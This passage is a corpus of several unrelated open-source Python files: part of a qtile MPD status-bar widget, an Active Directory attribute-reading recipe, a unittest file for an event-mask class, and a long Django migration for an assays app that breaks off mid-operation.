'a': get_artist, 'A': get_album, 'e': get_elapsed,
'f': get_file, 'l': get_length, 'n': get_number,
'p': get_playlistlength, 's': get_status, 'S': get_longstatus,
't': get_title, 'T': get_track, 'v': get_volume, '1': get_single,
'r': get_repeat, 'h': get_shuffle, '%': lambda x: '%',
}
def match_check(self, m):
try:
return self.formats[m.group(1)](self)
except KeyError:
return "(nil)"
def do_format(self, string):
return re.sub("%(.)", self.match_check, string)
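    # Editor's note (illustrative, not part of the original widget): given the
    # default fmt_playing of "%a - %t [%v%%]", a song by artist 'Foo' titled
    # 'Bar' at volume 80 would be rendered by do_format as "Foo - Bar [80%]";
    # the artist/title/volume values here are made-up examples.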
def _get_status(self):
playing = self.msg_nc
try:
self.status = self.client.status()
self.song = self.client.currentsong()
if self.status['state'] != 'stop':
text = self.do_format(self.fmt_playing)
if (self.do_color_progress and
self.status and
self.status.get('time', None)):
elapsed, total = self.status['time'].split(':')
percent = float(elapsed) / float(total)
progress = int(percent * len(text))
playing = '<span color="%s">%s</span>%s' % (
utils.hex(self.foreground_progress),
pangocffi.markup_escape_text(text[:progress]),
pangocffi.markup_escape_text(text[progress:])
)
else:
playing = pangocffi.markup_escape_text(text)
else:
playing = self.do_format(self.fmt_stopped)
except Exception:
logger.exception('Mpd error on update')
return playing
def poll(self):
was_connected = self.connected
if not self.connected:
if self.reconnect:
while not self.stop and not self.connect(quiet=True):
time.sleep(self.reconnect_interval)
else:
return
if self.stop:
return
if was_connected:
try:
self.client.send_idle()
self.client.fetch_idle()
except mpd.ConnectionError:
self.client.disconnect()
self.connected = False
return self.msg_nc
except Exception:
logger.exception('Error communicating with mpd')
self.client.disconnect()
return
return self._get_status()
def button_press(self, x, y, button):
if not self.connect():
return False
try:
status = self.client.status()
if button == 3:
if not status:
self.client.play()
else:
self.client.pause()
elif button == 4:
self.client.previous()
elif button == 5:
self.client.next()
elif button == 8:
if status:
self.client.setvol(
max(int(status['volume']) - self.inc, 0)
)
elif button == 9:
if status:
self.client.setvol(
min(int(status['volume']) + self.inc, 100)
)
except Exception:
logger.exception('Mpd error on click')
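# --- Editor's illustrative sketch (not part of the original widget module): in
# a qtile config.py this widget is assumed to be placed in a bar roughly like
#
#     from libqtile import bar, widget
#     from libqtile.config import Screen
#     screens = [Screen(bottom=bar.Bar(
#         [widget.Mpd(host='localhost', port=6600)], 24))]
#
# where the host/port values are placeholders for a local MPD instance.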
| dequis/qtile | libqtile/widget/mpdwidget.py | Python | mit | 11,020 |
import win32com
import win32com.client
def ad_dict(ldap_path, value_required=1):
    attr_dict = {}
    adobj = win32com.client.GetObject(ldap_path)
    schema_obj = win32com.client.GetObject(adobj.schema)
    for i in schema_obj.MandatoryProperties:
        value = getattr(adobj, i)
        if value_required and value is None:
            continue
        attr_dict[i] = value
    for i in schema_obj.OptionalProperties:
        value = getattr(adobj, i)
        if value_required and value is None:
            continue
        attr_dict[i] = value
    return attr_dict
user = 'LDAP://cn=fred123,OU=people,DC=company,DC=com'
print(ad_dict(user))
| ActiveState/code | recipes/Python/303348_Get_attributes_object_MS_Active/recipe-303348.py | Python | mit | 575 |
import unittest
from copernicus import Event
__author__ = 'gronostaj'
class EventTests(unittest.TestCase):
event = Event('test', '0101____')
def test_should_extract_argument_correctly(self):
min_ = EventTests.event.extract_arg('01010000')
max_ = EventTests.event.extract_arg('01011111')
self.assertEqual(min_, 0)
self.assertEqual(max_, 15)
def test_should_translate_argument_correctly(self):
event = Event('test', '0101____', lambda v: 2 * v + 5)
for x in (0, 2, 10):
self.assertEqual(event.transform(x), x * 2 + 5)
def test_should_error_when_extracting_with_non_matching_mask(self):
with self.assertRaises(ValueError):
EventTests.event.extract_arg('11111111')
def test_should_fail_extraction_on_invalid_input(self):
with self.assertRaises(Exception):
EventTests.event.extract_arg('22222222')
| gronostajo/copernicus-api | tests/testEvent.py | Python | mit | 921 |
# Generated by Django 2.2.24 on 2021-06-16 18:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('assays', '0047'),
]
operations = [
migrations.AlterField(
model_name='assaycategory',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaycategory_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaycategory',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaycategory_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaycategory',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaycategory_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychipreadout',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychipreadout_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychipreadout',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychipreadout_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychipreadout',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychipreadout_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychipsetup',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychipsetup_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychipsetup',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychipsetup_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychipsetup',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychipsetup_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychiptestresult',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychiptestresult_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychiptestresult',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychiptestresult_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychiptestresult',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychiptestresult_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaydatafileupload',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaydatafileupload_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaydatafileupload',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaydatafileupload_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaydatafileupload',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaydatafileupload_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaydatapoint',
name='subtarget',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='assays.AssaySubtarget', verbose_name='Subtarget'),
),
migrations.AlterField(
model_name='assaydataupload',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaydataupload_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaydataupload',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaydataupload_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaydataupload',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaydataupload_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayfailurereason',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayfailurereason_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayfailurereason',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayfailurereason_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayfailurereason',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayfailurereason_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaylayout',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaylayout_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaylayout',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaylayout_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaylayout',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaylayout_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymatrix',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymatrix_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymatrix',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymatrix_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymatrix',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymatrix_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymatrixitem',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymatrixitem_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymatrixitem',
name='failure_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='assays.AssayFailureReason', verbose_name='Failure Reason'),
),
migrations.AlterField(
model_name='assaymatrixitem',
name='group',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='assays.AssayGroup', verbose_name='Group'),
),
migrations.AlterField(
model_name='assaymatrixitem',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymatrixitem_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymatrixitem',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymatrixitem_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymeasurementtype',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymeasurementtype_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymeasurementtype',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymeasurementtype_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymeasurementtype',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymeasurementtype_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymethod',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymethod_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymethod',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymethod_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymethod',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymethod_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymethod',
name='supplier',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='assays.AssaySupplier', verbose_name='Supplier'),
),
migrations.AlterField(
model_name='assaymodel',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymodel_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymodel',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymodel_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymodel',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymodel_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymodeltype',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymodeltype_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymodeltype',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymodeltype_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymodeltype',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymodeltype_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayomicdatafileupload',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayomicdatafileupload_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayomicdatafileupload',
name='description',
field=models.CharField(default='file added - 20210616-14:45:48', help_text='A description of the data being uploaded in this file (e.g., "Treated vrs Control" or "Treated with 1uM Calcifidiol".', max_length=2000, verbose_name='Data Description'),
),
migrations.AlterField(
model_name='assayomicdatafileupload',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayomicdatafileupload_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayomicdatafileupload',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayomicdatafileupload_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadermap',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadermap_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadermap',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadermap_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadermap',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadermap_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadermapdatafile',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadermapdatafile_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadermapdatafile',
name='description',
field=models.CharField(blank=True, default='file added - 20210616-14:45:48', max_length=2000, null=True),
),
migrations.AlterField(
model_name='assayplatereadermapdatafile',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadermapdatafile_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadermapdatafile',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadermapdatafile_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadout',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadout_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadout',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadout_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatereadout',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatereadout_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatesetup',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatesetup_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatesetup',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatesetup_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatesetup',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatesetup_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatetestresult',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatetestresult_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatetestresult',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatetestresult_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayplatetestresult',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayplatetestresult_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayqualityindicator',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayqualityindicator_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayqualityindicator',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayqualityindicator_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayqualityindicator',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayqualityindicator_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayreader',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayreader_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayreader',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayreader_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayreader',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayreader_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayreference',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayreference_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayreference',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayreference_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayreference',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayreference_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayresultfunction',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayresultfunction_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayresultfunction',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayresultfunction_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayresultfunction',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayresultfunction_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayresulttype',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayresulttype_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayresulttype',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayresulttype_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayresulttype',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayresulttype_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayrun',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayrun_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayrun',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayrun_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayrun',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayrun_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayrunstakeholder',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysamplelocation',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysamplelocation_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysamplelocation',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysamplelocation_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysamplelocation',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysamplelocation_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysetting',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysetting_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysetting',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysetting_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysetting',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysetting_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudy',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudy_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudy',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudy_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudy',
name='organ_model',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='microdevices.OrganModel', verbose_name='MPS Model'),
),
migrations.AlterField(
model_name='assaystudy',
name='organ_model_protocol',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='microdevices.OrganModelProtocol', verbose_name='MPS Model Version'),
),
migrations.AlterField(
model_name='assaystudy',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudy_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudy',
name='study_configuration',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='assays.AssayStudyConfiguration', verbose_name='Study Configuration'),
),
migrations.AlterField(
model_name='assaystudyassay',
name='study',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='assays.AssayStudy', verbose_name='Study'),
),
migrations.AlterField(
model_name='assaystudyconfiguration',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudyconfiguration_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudyconfiguration',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudyconfiguration_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudyconfiguration',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudyconfiguration_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudyset',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudyset_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudyset',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudyset_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudyset',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaystudyset_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaystudystakeholder',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='Signed Off By'),
),
migrations.AlterField(
model_name='assaysupplier',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysupplier_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysupplier',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysupplier_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaysupplier',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaysupplier_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaytarget',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaytarget_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaytarget',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaytarget_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaytarget',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaytarget_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaywelltype',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaywelltype_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaywelltype',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaywelltype_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaywelltype',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaywelltype_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='physicalunits',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='physicalunits_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='physicalunits',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='physicalunits_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='physicalunits',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='physicalunits_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='unittype',
name='created_by',
